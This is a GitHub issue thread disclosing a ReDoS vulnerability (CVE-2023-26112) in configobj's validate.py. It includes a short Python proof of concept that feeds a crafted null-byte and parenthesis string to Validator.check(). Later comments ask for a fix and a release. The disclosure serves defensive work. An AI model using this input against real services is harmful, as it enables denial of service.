A ReDoS vulnerability exists in ./src/configobj/validate.py
DarkTinia opened this issue · comments
The affected code is located in validate.py-line660. It uses the vulnerable regular expression (.+?)\((.*)\)
. When the match fails, it will cause catastrophic backtracking.
I trigger the vulnerability using the python script below
from configobj.validate import Validator
value = "aaa"
i = 10
attack = '\x00'*16510*i + ')' + '('*16510*i
vtor = Validator()
newval1 = vtor.check(attack, value)
I see many projects referencing this file, when run server side there has possible DOS. It is my pleasure to provide a patch to repair the ReDoS vulnerability.
Opening a pull request that patches this vulnerability would be appreciated. Thank you.
Is this security hole fixed?
CVE-2023-26112 appears to have been assigned for this issue.
just ping, if any PR fixed this CVE?
Opening a pull request that patches this vulnerability would be appreciated. Thank you.
@robdennis I opened a PR, #236. Please let me know if you need me to change anything.
Any update on this one? Thanks
A new release including a fix (#236 ?) would be appreciated.
Dear https://github.com/DiffSK Team, please push a new release, containing these changes. Thank you for the prompt support!